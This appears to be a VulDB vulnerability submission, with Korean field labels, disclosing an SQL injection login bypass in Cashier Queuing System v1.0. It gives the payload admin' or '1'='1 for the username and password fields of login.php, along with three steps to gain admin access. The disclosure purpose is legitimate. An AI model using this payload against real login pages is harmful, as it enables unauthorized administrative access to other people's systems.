| 제목 | Cashier Queuing System V1.0 - SQL Injection Leads to admin account |
|---|
| 설명 | # Exploit Title: Cashier Queuing System V1.0 - SQL Injection Leads to the admin account
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Software Link: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Version: v1.0
# Tested on: Windows 11, Apache
Description: An SQL injection issue in Cashier Queuing System v.1.0 allows an attacker to log in to the admin account.
Vulnerable Parameters:
username
password
Payload:
admin' or '1'='1
Steps:
1) Go to the Login page:- http://localhost/queuing/login.php
2) Now in username and password we put our payload
Payload:- admin' or '1'='1
3) Now when you click submit you get logged in |
|---|
| 원천 | ⚠️ https://github.com/DisguisedRoot/Exploit/blob/main/SQLInj/POC |
|---|
| 사용자 | DisguisedRoot (UID 33702) |
|---|
| 제출 | 2022. 10. 17. PM 04:38 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 10. 18. AM 11:28 (19 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 211186 [SourceCodester Cashier Queuing System 1.0 Login Page /queuing/login.php username/password SQL 주입] |
|---|
| 포인트들 | 20 |
|---|